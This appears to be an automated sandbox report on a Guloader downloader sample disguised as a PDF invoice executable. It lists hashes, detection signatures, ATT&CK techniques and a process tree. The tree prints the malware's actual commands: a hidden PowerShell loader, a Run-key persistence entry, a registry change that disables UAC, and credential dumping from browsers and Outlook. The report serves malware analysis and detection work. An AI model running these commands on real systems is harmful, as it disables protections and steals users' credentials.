Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 09:49
Static task
static1
Behavioral task
behavioral1
Sample
OD2J305312A-200805674H-2024090716pdf.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
OD2J305312A-200805674H-2024090716pdf.exe
Resource
win10v2004-20240704-en
General
-
Target
OD2J305312A-200805674H-2024090716pdf.exe
-
Size
387KB
-
MD5
06e45d2db3c52517fc7139b3b32a4742
-
SHA1
602ab4e85c1506af02d51e144298bac3aea331ca
-
SHA256
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f
-
SHA512
32e1131c14136721d872ea13736fe7041d8d7e09a1efac363a4bc1d29a9bcd4fcfc8e523cf689386a7e8fe67100194211a1ea9934f7fde5f241df77adcdb61bd
-
SSDEEP
12288:3GqS6hqE06uAyNOcSN6dJjfJ1mPaxm5Bj3O9X:3GqS6hb0Kd4FBcixmBje9
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/3752-75-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2692-74-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2692-74-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3752-75-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4728-73-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\\Ufrugtbarhedens\\').quadricapsular;%Grshoppens% ($nedstemmes)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2700 wab.exe 2700 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 3176 powershell.exe 2700 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exewab.exedescription pid process target process PID 3176 set thread context of 2700 3176 powershell.exe wab.exe PID 2700 set thread context of 2692 2700 wab.exe wab.exe PID 2700 set thread context of 3752 2700 wab.exe wab.exe PID 2700 set thread context of 4728 2700 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exewab.exewab.exepid process 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe 4728 wab.exe 4728 wab.exe 2692 wab.exe 2692 wab.exe 2692 wab.exe 2692 wab.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exewab.exepid process 3176 powershell.exe 2700 wab.exe 2700 wab.exe 2700 wab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 3176 powershell.exe Token: SeDebugPrivilege 4728 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 2700 wab.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
OD2J305312A-200805674H-2024090716pdf.exepowershell.exewab.execmd.execmd.exedescription pid process target process PID 1568 wrote to memory of 3176 1568 OD2J305312A-200805674H-2024090716pdf.exe powershell.exe PID 1568 wrote to memory of 3176 1568 OD2J305312A-200805674H-2024090716pdf.exe powershell.exe PID 1568 wrote to memory of 3176 1568 OD2J305312A-200805674H-2024090716pdf.exe powershell.exe PID 3176 wrote to memory of 2700 3176 powershell.exe wab.exe PID 3176 wrote to memory of 2700 3176 powershell.exe wab.exe PID 3176 wrote to memory of 2700 3176 powershell.exe wab.exe PID 3176 wrote to memory of 2700 3176 powershell.exe wab.exe PID 3176 wrote to memory of 2700 3176 powershell.exe wab.exe PID 2700 wrote to memory of 2936 2700 wab.exe cmd.exe PID 2700 wrote to memory of 2936 2700 wab.exe cmd.exe PID 2700 wrote to memory of 2936 2700 wab.exe cmd.exe PID 2936 wrote to memory of 3672 2936 cmd.exe reg.exe PID 2936 wrote to memory of 3672 2936 cmd.exe reg.exe PID 2936 wrote to memory of 3672 2936 cmd.exe reg.exe PID 2700 wrote to memory of 4464 2700 wab.exe cmd.exe PID 2700 wrote to memory of 4464 2700 wab.exe cmd.exe PID 2700 wrote to memory of 4464 2700 wab.exe cmd.exe PID 4464 wrote to memory of 3932 4464 cmd.exe reg.exe PID 4464 wrote to memory of 3932 4464 cmd.exe reg.exe PID 4464 wrote to memory of 3932 4464 cmd.exe reg.exe PID 2700 wrote to memory of 2692 2700 wab.exe wab.exe PID 2700 wrote to memory of 2692 2700 wab.exe wab.exe PID 2700 wrote to memory of 2692 2700 wab.exe wab.exe PID 2700 wrote to memory of 2692 2700 wab.exe wab.exe PID 2700 wrote to memory of 3752 2700 wab.exe wab.exe PID 2700 wrote to memory of 3752 2700 wab.exe wab.exe PID 2700 wrote to memory of 3752 2700 wab.exe wab.exe PID 2700 wrote to memory of 3752 2700 wab.exe wab.exe PID 2700 wrote to memory of 4728 2700 wab.exe wab.exe PID 2700 wrote to memory of 4728 2700 wab.exe wab.exe PID 2700 wrote to memory of 4728 2700 wab.exe wab.exe PID 2700 wrote to memory of 4728 2700 wab.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\OD2J305312A-200805674H-2024090716pdf.exe"C:\Users\Admin\AppData\Local\Temp\OD2J305312A-200805674H-2024090716pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Metabolizable=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Emptyhanded.Sla139';$Kumpan=$Metabolizable.SubString(7195,3);.$Kumpan($Metabolizable)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"4⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:3672 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:3932 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\guatvonppz"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2692 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qwflvgxjdhpgl"4⤵
- Accesses Microsoft Outlook accounts
PID:3752 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bqkwwyilrphknjcjg"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4164,i,270339169963605285,17552719617811964021,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:81⤵PID:2960
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD55ad957af298d03de4e90b0a7eb64d9d4
SHA1aebce97e9f768846ae0aa46665acd36087f79556
SHA2569968ed883c080f0a20786493c199886e1815981e795c2fc6636823ac2c26218e
SHA512e1b468e05c8a74bb91d509d4a46a10e93cf4c83bb229cd568190009d533cab0f246edb044eebb3c0515e5c57c92ddbe32c9825781c5dc4d175b0055f9f193e30
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5be3be306ce816aa6030d9bfec1df34b0
SHA166b10c4578245de0f78c445119e67f0bfb84bbf3
SHA2560c38ee44dc9eb4f240b667240c115fed88091bc04001d909b841ad8570738467
SHA512b9aee88755e6e239c7aa1d3c39488722786c1faa01de3c70cf822059f461ca277965b8dd50773e015444a83cc69b5f31c6379957de54a5073ef8799b26a12bcc
-
Filesize
65KB
MD567cb075314762a89035c6b2b15c68f00
SHA1382134aa018f620cdfbab89a67ae7c10b22e8547
SHA256a853d35e1301ceef0526d96852cf8ed766c3d9f04bc5a7b49522b02d1b4302ea
SHA5125677a3b68f751f9cb252d45aa35f4609fe0f81c734b3ed44ddb2acd8e017c371027841892f61a7aa71debe950b2b7ea05ecdbfe577130c69a8d74c74cbaf4190
-
Filesize
325KB
MD5b9207704502bf9bc8956ea19f761c559
SHA1dee462bb9bff33881c21ce2f8615a222cbb28aa2
SHA256ea7565fe3b1b2fa90145b41406c2b175846785ba1be2d0248030dedbdd4aec6f
SHA512cba66f601051aaee865574f94996c480873017195c122d750f7355a777359ec0ba05b5f786c88753c7e3b87a01daeae82edba1d3a799e09e28f7ef8bc1f6d704